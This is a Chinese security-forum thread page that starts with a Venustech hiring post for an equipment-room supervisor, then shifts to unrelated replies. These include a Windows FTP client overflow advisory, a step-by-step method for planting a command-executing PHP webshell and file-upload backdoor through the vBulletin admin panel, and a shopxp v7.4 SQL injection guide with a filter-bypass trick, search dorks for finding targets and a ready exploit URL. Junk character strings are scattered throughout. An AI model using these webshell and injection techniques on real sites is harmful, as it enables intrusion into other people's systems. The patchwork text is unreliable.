返回列表 发帖
  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: liu_yanhua@venustech.com.cn
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    岗位:备机库主管
    ( k# k( D; ?4 C3 a$ P) g' y5 m+ z1 Y6 ^$ n2 h/ K

    . N) ~; d- D+ T3 f& `1 y岗位职责:, {8 ~- n# X( |
    3 g  R* s9 e1 u% k. l1 j
    1.负责公司产品备机库的管理。: I/ j  H( {$ x3 p

    4 Z; k+ H8 |$ M& J0 u1 J2.产品安装调试。
    ( S8 @+ H* `4 U9 W) [
    ! r& O* Y$ L4 D8 e: \4 J4 R; |% v3.对备机使用情况做统计分析。
      C( y) X0 [1 N0 {  p/ H6 J
      R) ^: @* n- v* m4 l" k% \岗位要求:, r+ v5 ]" }5 @% \
    : T- U6 ~9 g( X& }% L, E
    1.熟悉客户关系管理、网络安全相关知识;了解数据统计分析技术。7 C$ x& @5 u! O4 w  B$ w9 v. Y
    + A) g9 j  w3 ^0 c6 k- D& C; [5 \
    2.熟悉路由器、交换机等常用网络设备。3 g) W( B; h: S8 L, S
    # s) ^6 V$ g9 M
    3.熟悉防火墙、VPN等常见网络安全产品。
    % H- j+ L3 _4 M8 F9 a' i1 V) G3 g& L7 N
    4.了解计算机硬件相关知识。3 P3 V$ C% }& {6 y3 ?9 Z

    ! U2 T0 x8 P& b7 [4 R0 P, j5.一年以上硬件技术支持经验,有网络安全行业经验优先考虑。
    $ A% T  L4 q* z- k1 G& B' m4 A* D5 R
    6 E! P0 k" ~1 D. U5 p4 U) ~6.有较强的责任心,有敬业精神,有良好的沟通能力、动手能力,有团队合作精神,学习能力强。' _, E  S- @6 k7 d4 N# D
    , p8 q- k/ f) i6 j
    发送简历

     

    您可能还想看的主题:

    浙江政安信息安全研究中心招贤纳士啦!

    启明星辰研发招聘

    合优网站管理系统存在SQL注射。。。原创首发~

    联想研究院 安全职位

    PHP VS ASP

    计算机硬件维护知识

    1

    评分人数

      • webmaster: 楼主MJJ威望 + 30 金钱 + 200 金
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    Microsoft Windows FTP客户端有多个远程溢出漏洞
    受影响系统:Microsoft Windows XPMicrosoft Windows 2000SP4Microsoft Windows 2000 Server SP4
    + f* g$ H" D0 J1 {  q% @- }
    描述:
    9 E$ f$ @( q% O0 k7 g4 [1 I! r% h
    Microsoft Windows是微软发布的非常流行的操作系统。

    : A) f0 b3 _: ~! c( a5 s" z/ M, }; O; G+ b
    Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制客户端。

    ' C# }, s9 r+ Z) ^
    Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令,如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话,就可以触发缓冲区溢出,导致拒绝服务或执行任意指令。但这个漏洞较难利用,因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。
    9 X" m- E( ^+ T, I, C8 f( O. ~
    厂商补丁:
    9 |) X4 v8 q0 D. a. ~$ ~) e
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
    4 y/ a) n- }, C- M( d0 p
    http://www.microsoft.com/technet/security/

    / l' G) K* _% n, P/ b8 v# g" z7 L" t2 F  P3 v6 B& s

    3 {, S& t! L  e6 T
    0 t. ~7 R# h2 |+ k, e0 J7 j# R! L2 @2 Y: J7 x
    8 G* c0 F- I& N# K$ J: j3 `- _

    6 u4 R  P1 l5 Q* j( J9 D0 r5 a
    + R% d: C- {( Y3 v
    6 X2 l% V8 m6 G1 G5 k
    ! L) ?7 W7 E/ z0 z* |% }5 s6 D% V6 {3 t( y

    ! U# ^( L9 A, Q( o& r) }; U$ N% K8 e9 J
    $ _+ m# G! u1 A- m/ r
    ; L1 e8 B4 F! a0 N3 P! d

    ) L( y( [5 _/ |/ S& P- C1 z6 F2 f. e) ?
    ; D% D, T* a$ L9 w3 z

      w# C2 K9 Y4 E公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    vBulletin后台获取webshell方法总结
    方法一:$ z2 ]. \5 u; c+ H/ v4 K5 N
    首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。
    0 _; m" a% e5 U  f# k
    4 ]% f5 `6 W, r( S5 E方法二:
    & G% ?$ u# j: B, a前边相同,代码处写一个接收上传的代码:
    5 r# m3 y+ C: d& g  ^
    $target_path = "images/avatars"; //注意权限要为可写的

      w8 n9 B* e+ i! r
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
    : a' z- q) t: V7 s
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    : i( g& l7 t0 K# z( P/ j    echo "The file ". basename( $_FILES['uploadedfile']['name']).
    ' Y4 m* }+ d9 l/ `    " has been uploaded"; * k9 j6 C& E. Q; X4 r" b
    } else{ ! P* _3 x. Z3 g
        echo "There was an error uploading the file, please try again!";
    , P0 _; u5 a" R# N' i}

    5 W$ O) R- X/ Y9 K
       然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:

    6 K& ^; F- h( r8 W% A
    <form enctype="multipart/form-data" action="ajax.php" method="POST">
    0 v( v5 @3 q9 d' v7 M9 J<input type="hidden" name="MAX_FILE_SIZE" value="100000" /> 0 }) O* p6 J; O: n
    Choose a file to upload: <input name="uploadedfile" type="file" /><br /> 9 r! V7 a; P1 e4 F: W
    <input type="hidden" name="s" value="$session[sessionhash]" /> & F4 c7 B8 C: ^6 q: f" Z- q2 L0 X
    <input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" /> , o* u- }2 O: S# ?+ j& l
    <input type="submit" value="Upload File" />
    8 g, D6 i7 ^) ]4 E</form>
    0 `: V' h5 A5 S5 \" s; M
    保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用; o/ W; O' c% o
    " N% ^" E" S% J  c; `/ q. H
    $ n5 w' N- y: m& v# b* `
    : A9 {  d  `% ]+ A* K+ ~

    ( F: G2 n3 v$ q$ B2 o; Z1 q; O, L
    $ J& o4 |5 `3 A, u/ v8 k2 T2 {/ ]( h# X, U

    # `3 Q) V: X# c' Q! p8 o! O; U" W* x! G8 H& T

    " K# a- `( ^9 r
    6 R& G, M; h$ J: h
    , O  f# C2 g: {9 m3 Q- G3 P+ i$ [8 y- F7 N; c. K

    + f. m! u3 z" b( P4 c3 m1 z4 {+ _0 \$ N. @) T+ ~
    & J1 a" l) U! G# d" Q: ^1 y8 X

    7 I( L( W/ n0 j" L  o0 a5 V0 y  G' Y
    + s1 W+ F; z1 W0 P6 C9 K! ]1 p) V1 F0 A1 c
    ) }8 o' J" h$ J) E5 U: Y

    ! _5 n9 e$ P2 w' r' p5 x0 N公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    shopxp v7.4 SQL注入漏洞
    shopxp网上购物系统 v7.4存在Sql注入漏洞。问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp问题代码:<% % z4 C8 M) t: o' V" H4 Z
    dim shopxpbe_id, anclassname, shopxpse_id, nclassnamedim totalPut dim CurrentPage, TotalPages
    4 H0 z5 t5 N0 `+ N5 @2 n
    if request("shopxpbe_id")<>"" thenshopxpbe_id=request("shopxpbe_id")elseshopxpbe_id=0end ifif request("shopxpbe_id")="" then shopxpbe_id=1end ifif not isempty(request("page")) thencurrentPage=cint(request("page"))elsecurrentPage=1end if
    * U( o* v3 W# [
    set rs=server.createobject("adodb.recordset")rs.open "select * from shopxp_btype where shopxpbe_id="&amp;shopxpbe_id,conn,1,1anclassname=rs("shopxpbe_name")rs.close%>并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向Fy_Zx = "../" '出错时转向的页面On Error Resume NextFy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&amp;")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)NextFor Fy_x=0 to ubound(Fy_Cs)If Fy_Cs(Fy_x)<>"" ThenIf Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 ThenSelect Case Fy_Cl省略部分代码
    0 y# H( c6 y) d: h7 G2 A3 ~
    这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:
    ( M. _. v; V8 ^) s* M
    “它的思路就是先获得提交的数据,以“&amp;”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。

    6 z; u, x6 e. k# z9 b" W, w5 t2 ~' Q
    乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?
    . x) _! a0 K/ a6 k2 \
    它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。

    / x1 g, K0 c, C1 A- x! q# }
    等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。

    % s5 D0 z  Q' t
    程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”

    & \1 v' B7 _% ~7 ^. ?  y" s2 Y2 `5 A
    下面说下利用:Google:inurl:xpCatalog_xpDesc.asp?action_key_order=biginurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)构造如下地址:http://www.sitedir.com.cn/xpCatalog_xpDesc.asp?action_key_order=big&amp;shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)默认后台是 admin_shopxp 或者admin
    2 }( U4 S! {" }1 W

    1 W! s( V' C2 A) B; [# d
    # x" a2 v- ]& I: K! C3 F$ Q2 \
    8 P7 L! x( G, B6 Y3 Z5 \2 b( c+ {( j
    : \# i* f. N8 j2 ^# q0 u
    3 F- d, X; E6 O/ i
    ; B" z. `9 M% Q9 G6 C! g. Y) [% v1 G! {) |. a& n# d# f
    5 p, Q# j6 A, G+ R

    : X) b: o( l6 v+ u" S  U
    : f' s: z8 O) G" d1 y
      s2 U9 }( @/ {% q7 w4 F+ [# c
      m1 w! I. j# F+ L! e. `
    4 t5 @3 n' E5 W! |- u( U5 w- o2 [. h) h9 C3 T; A

    # D4 ]7 |, u) U& i9 i4 ^4 o1 Y; X- S- C. ]8 q. V1 o9 \7 O" `
    , i. U( p: W. n3 L( P
    / ^$ s' f& ?! g- z+ b3 V( ^
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表